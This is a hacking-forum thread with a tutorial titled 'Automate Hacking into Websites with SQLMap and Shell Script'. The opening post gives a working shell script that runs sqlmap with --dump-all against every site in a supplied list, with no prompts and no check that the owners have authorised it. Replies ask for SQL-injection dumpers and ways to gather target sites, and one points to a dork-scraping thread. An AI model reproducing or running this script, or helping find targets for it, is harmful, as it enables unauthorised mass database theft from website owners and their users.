Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial Automate Hacking into Websites with SQLMap and Shell Script filter_list
Author
Message
Automate Hacking into Websites with SQLMap and Shell Script #1
1. Just get a list of websites and save them to a file.
2. save this shell script to a file

Code:
#!/bin/sh
#sunjester / https://underwurld.club
#automating sqlmap 
if [ -z $1 ];
then
        echo "specify a file"
        exit
fi

while IFS='' read -r line || [[ -n "$line" ]]; do
        sqlmap -u $line --dump-all --answers="follow=Y" --batch
done < "$1"

3. execute the shell script in your console with the name of the file with the list of websites you saved

(This script will suppress all the questions and may take longer than a normal sqlmap scan.)

[+] 2 users Like sunjester's post
Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #2
Do you happen to know a virus-free sqli dumper
Tryna Surf Cool

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #3
(05-19-2019, 12:10 AM)roastedtv Wrote: Do you happen to know a virus-free sqli dumper

http://sqlmap.org

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #4
(05-19-2019, 12:11 AM)sunjester Wrote:
(05-19-2019, 12:10 AM)roastedtv Wrote: Do you happen to know a virus-free sqli dumper

http://sqlmap.org

Thanks appreciate it Smile
Tryna Surf Cool

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #5
nice looking script. thank you for sharing?
My IT skills that I know perfect is SQL, HTML ,css ,wordpress, PHP.
coding skills that I know is Java, JavaScript and C#

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #6
Thanks for sharing! Do you have a good Method or Tool to grab websites fast and specific?

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #7
(05-19-2019, 10:52 AM)Sh1tHappens Wrote: Thanks for sharing! Do you have a good Method or Tool to grab websites fast and specific?

No but I guess I could write something.

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #8
https://sinister.ly/Thread-get-duckduckg...from-dorks

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #9
(05-19-2019, 04:33 PM)sunjester Wrote: https://sinister.ly/Thread-get-duckduckg...from-dorks

Wow! Thanks for your work, I already post in your other thread.

Reply

RE: Automate Hacking into Websites with SQLMap and Shell Script #10
I actually have sqlmap dowloaded right now on my PC. I've also used it and it works great. Can the Shell script be used on Windows?

Reply







Users browsing this thread: 1 Guest(s)